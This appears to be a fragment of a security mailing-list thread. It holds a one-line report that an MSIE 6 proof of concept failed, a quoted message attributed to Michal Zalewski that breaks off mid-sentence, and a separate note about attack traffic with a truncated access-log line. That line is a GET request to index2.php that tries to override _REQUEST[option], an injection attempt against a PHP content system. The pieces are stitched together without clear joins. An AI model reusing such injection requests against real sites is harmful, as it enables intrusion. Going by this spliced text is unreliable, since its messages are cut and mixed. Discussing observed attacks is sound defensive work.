BTW, tested the POC on MSIE (File Version = 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158))
with mshtml.dll (6.00.2900.2802 (xpsp_sp2_gdr.051123-1230)) and it didn't worked.
On 3/16/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
Good morning,This might not come as a surprise, but there appears to be a
This is not the first time that we see those kind of "attacks", but on
the recent days, I've noticed those requests on my webservers with a
considerable frequency:
83.84.14X.XXX - - [06/Mar/2006:18:18:12 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_conten